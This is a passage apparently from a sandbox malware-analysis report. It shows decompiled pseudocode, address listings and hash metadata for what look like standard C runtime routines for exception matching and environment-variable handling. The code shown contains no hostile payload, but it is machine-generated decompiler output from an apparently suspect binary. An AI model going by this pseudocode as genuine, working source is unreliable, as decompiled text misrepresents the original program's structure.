										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E0090847C(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E0090847C(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E0090847C(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E0090847C(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00906646(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00908778(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00906A10(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E0090847C(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E0090920D(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E0090847C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E0090847C(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E0090847C(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E0090847C(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E0090920D(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E0090EA58(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00908E96( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x958e4c) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E00906A10(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00908E7E( &_v64);
											E009065DA( &_v64, 0x92a44c);
											L64:
											 *(E0090847C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E0090847C(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00906839(_t275, _t315, _t270);
											E0090910D(_a8, _a16, _t301);
											_t234 = E009092CA(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E00909084(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x009087f8
0x009087ff
0x00908801
0x0090880a
0x00908810
0x00908818
0x0090881a
0x0090881d
0x00908823
0x00908b97
0x00908b97
0x00908b9c
0x00908b9e
0x00908ba0
0x00908ba3
0x00908ba4
0x00908ba7
0x00908bad
0x00908ccc
0x00908bb3
0x00908bb5
0x00908bbc
0x00908bbf
0x00908bc2
0x00908bc8
0x00908bca
0x00908bcf
0x00908bd2
0x00908bd4
0x00908bda
0x00908bdc
0x00908be2
0x00908bf7
0x00908bfc
0x00908bff
0x00908c01
0x00908cc8
0x00000000
0x00908cc9
0x00908c01
0x00908be2
0x00908bda
0x00908bd2
0x00908c07
0x00908c0a
0x00908c0d
0x00908c10
0x00908c13
0x00908c19
0x00908c2b
0x00908c30
0x00908c33
0x00908c36
0x00908c39
0x00908c3c
0x00908c3f
0x00908c42
0x00000000
0x00000000
0x00908c48
0x00908c48
0x00908c4b
0x00908c4e
0x00908c5d
0x00908c5e
0x00908c5e
0x00908c60
0x00908c63
0x00000000
0x00000000
0x00908c65
0x00908c68
0x00000000
0x00000000
0x00908c76
0x00908c78
0x00908c7b
0x00908c7d
0x00908c85
0x00908c85
0x00908c88
0x00908c8a
0x00908c8c
0x00908ca8
0x00908cad
0x00908cb0
0x00908cb0
0x00000000
0x00908c88
0x00908c7f
0x00908c83
0x00000000
0x00000000
0x00000000
0x00908cb3
0x00908cb6
0x00908cb7
0x00908cba
0x00908cbd
0x00908cc0
0x00908cc3
0x00908cc3
0x00000000
0x00908c4e
0x00908ccd
0x00908cd2
0x00908cd3
0x00908cd6
0x00908cd9
0x00908cda
0x00908cdb
0x00908cdc
0x00908cdf
0x00908ce1
0x00908d59
0x00908d5b
0x00908d5b
0x00908ce3
0x00908ce3
0x00908ce6
0x00908ce9
0x00000000
0x00908ceb
0x00908ceb
0x00908cee
0x00908cf1
0x00908cf8
0x00908cf8
0x00908cfb
0x00908cfd
0x00908cff
0x00908d31
0x00908d31
0x00908d34
0x00908d3b
0x00908d3b
0x00908d3e
0x00908d41
0x00908d48
0x00908d48
0x00908d4b
0x00908d52
0x00908d54
0x00908d54
0x00908d4d
0x00908d4d
0x00908d50
0x00000000
0x00000000
0x00908d50
0x00908d43
0x00908d43
0x00908d46
0x00000000
0x00000000
0x00908d46
0x00908d36
0x00908d36
0x00908d39
0x00000000
0x00000000
0x00908d39
0x00908d55
0x00908d01
0x00908d01
0x00908d01
0x00908d04
0x00908d04
0x00908d06
0x00908d08
0x00000000
0x00000000
0x00908d0a
0x00908d0c
0x00908d20
0x00908d20
0x00908d0e
0x00908d0e
0x00908d11
0x00908d14
0x00000000
0x00908d16
0x00908d16
0x00908d19
0x00908d1c
0x00908d1e
0x00000000
0x00000000
0x00000000
0x00000000
0x00908d1e
0x00908d14
0x00908d29
0x00908d29
0x00908d2b
0x00000000
0x00908d2d
0x00908d2d
0x00908d2d
0x00000000
0x00908d2b
0x00908d24
0x00908d26
0x00908d26
0x00000000
0x00908d26
0x00908cf3
0x00908cf3
0x00908cf6
0x00000000
0x00000000
0x00000000
0x00000000
0x00908cf6
0x00908cf1
0x00908ce9
0x00908d5c
0x00908d60
0x00908d60
0x00908832
0x00908832
0x0090883b
0x00908938
0x00908938
0x0090893b
0x00000000
0x0090886a
0x0090886a
0x0090886f
0x00000000
0x00908875
0x00908875
0x0090887d
0x00908b31
0x00908b35
0x00908883
0x00908888
0x0090888b
0x00908890
0x00908897
0x0090889c
0x00000000
0x009088d4
0x009088dc
0x00908940
0x00908940
0x00908943
0x00908946
0x00908948
0x0090894b
0x0090894e
0x00908954
0x00908b00
0x00908b00
0x00908b03
0x00000000
0x00908b05
0x00908b05
0x00908b08
0x00000000
0x00908b0e
0x00908b0e
0x00908b11
0x00908b14
0x00908b15
0x00908b16
0x00908b19
0x00908b1a
0x00908b1d
0x00908b1e
0x00908b23
0x00000000
0x00908b23
0x00908b08
0x0090895a
0x0090895a
0x0090895e
0x00000000
0x00908964
0x00908964
0x0090896b
0x00908983
0x00908983
0x00908986
0x00908989
0x0090898f
0x0090899f
0x009089a4
0x009089a7
0x009089aa
0x009089ad
0x009089b0
0x009089b3
0x009089b6
0x009089bc
0x009089bc
0x009089bf
0x009089c2
0x009089d1
0x009089d2
0x009089d2
0x009089d4
0x009089d7
0x009089dd
0x009089e0
0x009089e6
0x009089e8
0x009089eb
0x009089ee
0x009089f4
0x009089f7
0x009089fc
0x009089fc
0x009089ff
0x00908a02
0x00908a05
0x00908a08
0x00908a0b
0x00908a10
0x00908a11
0x00908a12
0x00908a13
0x00908a14
0x00908a17
0x00908a1a
0x00908a1c
0x00000000
0x00908a1e
0x00908a1e
0x00908a1e
0x00908a1f
0x00908a21
0x00908a24
0x00908a25
0x00908a2a
0x00908a2d
0x00908a2f
0x00000000
0x00000000
0x00908a31
0x00908a34
0x00908a35
0x00908a38
0x00908a3a
0x00000000
0x00908a3c
0x00908a3c
0x00908a3f
0x00000000
0x00908a3f
0x00000000
0x00908a3a
0x00908a53
0x00908a59
0x00908a76
0x00908a7b
0x00908a7b
0x00908a7e
0x00908a7e
0x00000000
0x00908a42
0x00908a42
0x00908a43
0x00908a46
0x00908a49
0x00908a4c
0x00908a4c
0x00000000
0x00908a51
0x009089ee
0x009089e0
0x00908a81
0x00908a84
0x00908a85
0x00908a88
0x00908a8b
0x00908a8e
0x00908a91
0x00908a91
0x00908a9a
0x00908a9d
0x00908a9d
0x009089b6
0x00908aa0
0x00908aa4
0x00908aa6
0x00908aa9
0x00908aaf
0x00908aaf
0x00908ab7
0x00908abc
0x00908b26
0x00908b26
0x00908b2b
0x00908b2f
0x00000000
0x00000000
0x00000000
0x00000000
0x00908abe
0x00908ac1
0x00908ac4
0x00908ac8
0x00908ad6
0x00908ad8
0x00908aef
0x00908af3
0x00908af9
0x00908afa
0x00908afc
0x00000000
0x00908afe
0x00000000
0x00908afe
0x00000000
0x00000000
0x00000000
0x00908aca
0x00908aca
0x00908acc
0x00000000
0x00908ace
0x00908ace
0x00908ad2
0x00000000
0x00908ad4
0x00908ada
0x00908adf
0x00908ae2
0x00908ae7
0x00908aea
0x00000000
0x00908aea
0x00908ad2
0x00908acc
0x00908ac8
0x0090896d
0x0090896d
0x00908974
0x00000000
0x00908976
0x00908976
0x0090897d
0x00000000
0x00000000
0x00000000
0x00000000
0x0090897d
0x00908974
0x0090896b
0x0090895e
0x009088de
0x009088e6
0x009088e9
0x009088ee
0x009088f2
0x009088f5
0x009088fb
0x009088fe
0x00000000
0x00908900
0x00908900
0x00908903
0x00908905
0x00908b36
0x00908b36
0x00000000
0x0090890b
0x00908913
0x0090891e
0x00000000
0x00000000
0x00908927
0x0090892a
0x0090892b
0x0090892e
0x00908930
0x00000000
0x00908936
0x00000000
0x00908936
0x00000000
0x00908930
0x0090890b
0x00908b3b
0x00908b3b
0x00908b3d
0x00908b3e
0x00908b45
0x00908b48
0x00908b56
0x00908b5b
0x00908b60
0x00908b63
0x00908b68
0x00908b6b
0x00908b6e
0x00908b70
0x00908b72
0x00908b72
0x00908b77
0x00908b83
0x00908b89
0x00908b8e
0x00908b91
0x00908b92
0x00000000
0x00908b92
0x009088fe
0x009088dc
0x0090889c
0x0090887d
0x0090886f
0x0090883b

APIs

type_info::operator==.LIBVCRUNTIME ref: 00908917
___TypeMatch.LIBVCRUNTIME ref: 00908A25
_UnwindNestedFrames.LIBCMT ref: 00908B77
CallUnexpected.LIBVCRUNTIME ref: 00908B92

Strings

csm, xrefs: 009088A2
csm, xrefs: 0090894E
csm, xrefs: 00908835

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: f7f03ace808b3a864a5b25b62cde8bc0eb73d7b124476947ec492272ffd5d4ff
Instruction ID: dede91cd6df89563e35d08b09cc7c5a4c5bab39711d1c0bb9be329077dc7e93f
Opcode Fuzzy Hash: f7f03ace808b3a864a5b25b62cde8bc0eb73d7b124476947ec492272ffd5d4ff
Instruction Fuzzy Hash: CEB18D71A00209EFCF14EFA4C881AAFBBB9FF54310F14455AE8916B292DB30DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00916E23 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00916E23(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E0091C930(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E00909B5C(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x959b70 - _t110; // 0x10cf640
							if(__eflags != 0) {
								L14:
								_t64 =  *0x959b70; // 0x10cf640
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E0091712B(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00919724(_t120, _t139, 4);
													E0090F884(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E0090F884( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00919724(_t139, _t138, 4);
												E0090F884(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x959b70 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00910679(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E0090F884(_t149);
													goto L40;
												} else {
													_t76 = E0090EA94(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00909AAF();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00910679(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E0090BE59(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E0090F884(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00910679(_t53, 1);
																		E0090F884(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E0090EA94( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00909AAF();
																				asm("int3");
																				_t84 =  *0x959b70; // 0x10cf640
																				__eflags = _t84 -  *0x959b7c; // 0x10cf640
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x959b70 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E0091B674(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E00909B5C(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x959b70 = E00910679(1, 4);
										E0090F884(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x959b70 - _t110; // 0x10cf640
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x959b74 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x959b74 = E00910679(1, 4);
												E0090F884(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x959b74 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E0090F884(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x959b74 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L0090C949();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00909B5C(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00916e23
0x00916e26
0x00916e28
0x00916e2c
0x00916e2f
0x00916e31
0x00916e46
0x00916e4b
0x00916e4d
0x00916e52
0x00916e57
0x00916e59
0x0091703a
0x0091703f
0x00000000
0x00916e5f
0x00916e5f
0x00916e61
0x00000000
0x00916e67
0x00916e6a
0x00916e6d
0x00916e72
0x00916e74
0x00916e7a
0x00916ef7
0x00916ef7
0x00916efc
0x00916eff
0x00916f01
0x00000000
0x00916f07
0x00916f0e
0x00916f13
0x00916f18
0x00916f1b
0x00916f1d
0x00916f6e
0x00916f6e
0x00916f71
0x00000000
0x00916f77
0x00916f77
0x00916f79
0x00916f7c
0x00916f7c
0x00916f7f
0x00916f81
0x00000000
0x00916f87
0x00916f87
0x00916f8d
0x00000000
0x00916f93
0x00916f9d
0x00916fa0
0x00916fa5
0x00916fa8
0x00916fab
0x00916fad
0x00000000
0x00916fb3
0x00916fb3
0x00916fb6
0x00916fb8
0x00916fbb
0x00000000
0x00916fbb
0x00916fad
0x00916f8d
0x00916f81
0x00916f1f
0x00916f1f
0x00916f21
0x00000000
0x00916f23
0x00916f26
0x00916f2c
0x00916f2f
0x00916f32
0x00916f67
0x00916f69
0x00916f34
0x00916f34
0x00916f41
0x00916f41
0x00916f44
0x00000000
0x00000000
0x00916f3d
0x00916f40
0x00916f40
0x00916f40
0x00916f50
0x00916f53
0x00916f58
0x00916f5b
0x00916f5e
0x00916f60
0x00916fbf
0x00916fbf
0x00916fbf
0x00916f60
0x00916fc4
0x00916fc7
0x00000000
0x00916fc9
0x00916fc9
0x00916fcc
0x00916fcc
0x00916fce
0x00916fcf
0x00916fcf
0x00916fdb
0x00916fe3
0x00916fe6
0x00916fe7
0x00916fe9
0x00917031
0x00917032
0x00000000
0x00916feb
0x00916ff2
0x00916ff7
0x00916ffa
0x00916ffc
0x00917056
0x00917057
0x00917058
0x00917059
0x0091705a
0x0091705b
0x00917060
0x00917063
0x00917067
0x00917068
0x0091706b
0x0091706d
0x00917074
0x00917076
0x00917078
0x0091707a
0x0091707c
0x0091707c
0x0091707f
0x00917080
0x00917080
0x0091707c
0x00917086
0x00917091
0x00917094
0x00917095
0x00917097
0x009170ff
0x009170ff
0x00000000
0x00917099
0x00917099
0x0091709b
0x0091709d
0x009170ef
0x009170f1
0x009170f7
0x00000000
0x0091709f
0x0091709f
0x009170a2
0x009170a2
0x009170a4
0x009170a4
0x009170a4
0x009170a7
0x009170a7
0x009170a9
0x009170aa
0x009170aa
0x009170b2
0x009170b6
0x009170c0
0x009170c3
0x009170c8
0x009170cb
0x009170cf
0x00000000
0x009170d1
0x009170d9
0x009170de
0x009170e1
0x009170e3
0x00917104
0x00917106
0x00917107
0x00917108
0x00917109
0x0091710a
0x0091710b
0x00917110
0x00917111
0x00917116
0x0091711c
0x0091711e
0x0091711f
0x00917125
0x00000000
0x00917125
0x0091712a
0x00000000
0x00000000
0x00000000
0x009170e3
0x00000000
0x009170e5
0x009170e5
0x009170e8
0x009170ea
0x009170ea
0x00000000
0x009170ee
0x0091709d
0x0091706f
0x0091706f
0x0091706f
0x00917071
0x00917073
0x00917073
0x00916ffe
0x0091700f
0x00917013
0x0091701f
0x00917021
0x00917023
0x00917028
0x00917028
0x0091702b
0x0091702b
0x00000000
0x00917021
0x00916ffc
0x00916fe9
0x00916fc7
0x00916f21
0x00916f1d
0x00916e7c
0x00916e7c
0x00916e7f
0x00916e9d
0x00916e9d
0x00916ea0
0x00916eb3
0x00916eb8
0x00916ebd
0x00916ec0
0x00916ec6
0x00917045
0x00917045
0x00917045
0x00000000
0x00916ecc
0x00916ecc
0x00916ed2
0x00000000
0x00916ed4
0x00916ede
0x00916ee3
0x00916ee8
0x00916eeb
0x00916ef1
0x00000000
0x00000000
0x00000000
0x00000000
0x00916ef1
0x00916ed2
0x00916ea2
0x00916ea2
0x00917048
0x00917049
0x00917050
